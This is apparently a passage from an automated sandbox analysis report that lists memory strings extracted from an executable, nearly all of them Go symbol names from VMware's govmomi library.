            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3755
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostDisconnectedEventReasonCode.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RemoveVirtualNic
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfUnsupportedDeviceExport).GetOvfExport
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.HostInventoryFullEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostMountInfoInaccessibleReason.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2416
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3747
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*FeatureRequirementsNotMet).GetVmConfigFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RetrieveHostSpecificationRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2415
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3746
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3749
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2418
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VirtualMachineMemoryAllocationPolicy.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2417
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3748
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2419
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2410
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3741
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3740
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2412
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3743
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2411
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3742
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3745
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2414
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmPortGroupProfile).GetApplyProfile
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.NvdimmNamespaceDeleteSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2413
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3744
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*LicenseDowngradeDisallowed).GetRuntimeFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HealthUpdateInfoComponentType).Values
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: )*[2]types.VirtualMachineStandbyActionType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostCpuPackageVendor.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotChangeVsanClusterUuidFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2405
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3736
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3735
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2404
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDeviceBackingOption).GetVirtualDeviceBackingOption
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2407
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3738
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2406
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3737
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2409
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2408
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3739
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3730
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*LicenseExpiredFault).GetNotEnoughLicenses
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ResourceAllocationOption).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotEnableVmcpForClusterReason).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2401
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3732
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2400
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3731
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2403
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3734
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2402
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3733
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DiskTooSmall).GetVsanDiskFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CustomizationIpV6Generator).GetCustomizationIpV6Generator
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualNVMEController).GetVirtualController
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfConsumerCallbackFault).GetOvfFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[196]github.com/vmware/govmomi/vim25/types.VirtualMachineGuestOsIdentifier
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3725
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3724
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3727
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3726
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3729
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*MemorySizeNotSupportedFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3728
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostOpaqueSwitchOpaqueSwitchState).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfInvalidValueReference).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidClientCertificateFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3721
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3720
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*UserLogoutSessionEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3723
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3722
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotAccessVmDisk).GetCannotAccessVmDevice
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GatewayOperationRefused).GetGatewayConnectFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*WakeOnLanNotSupported).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VirtualDevicePipeBackingOption
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NetIpConfigSpecIpAddressSpec).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3714
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3713
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3716
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*LegacyNetworkInterfaceInUseFault).GetVmConfigFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3715
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDeviceConfigSpecChangeMode).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3718
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3717
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ExtendedEvent).GetEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3719
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmMessageWarningEvent).GetVmEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ScheduledTaskStartedEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualBusLogicController).GetVirtualSCSIController
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualMachineConfigSpecEncryptedFtModes).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3710
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3712
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RunScheduledTaskRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3711
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NasSessionCredentialConflictFault).GetNasConfigFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateFolder
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidState).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.HostNewNetworkConnectInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmInstanceUuidAssignedEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RefreshDateTimeSystem
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.HostDasErrorEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*StorageDrsPodConfigInfoBehavior).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3703
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3702
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3705
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3704
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3707
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3706
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3709
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GeneralEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3708
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ReplicationVmInProgressFault).GetReplicationVmFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3701
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3700
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UninstallServiceRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CollectorAddressUnset).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/xml.printer.WriteByte
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*UpgradePolicy).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterInfraUpdateHaConfigInfoBehaviorType).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterDasAdmissionControlPolicy).GetDynamicData
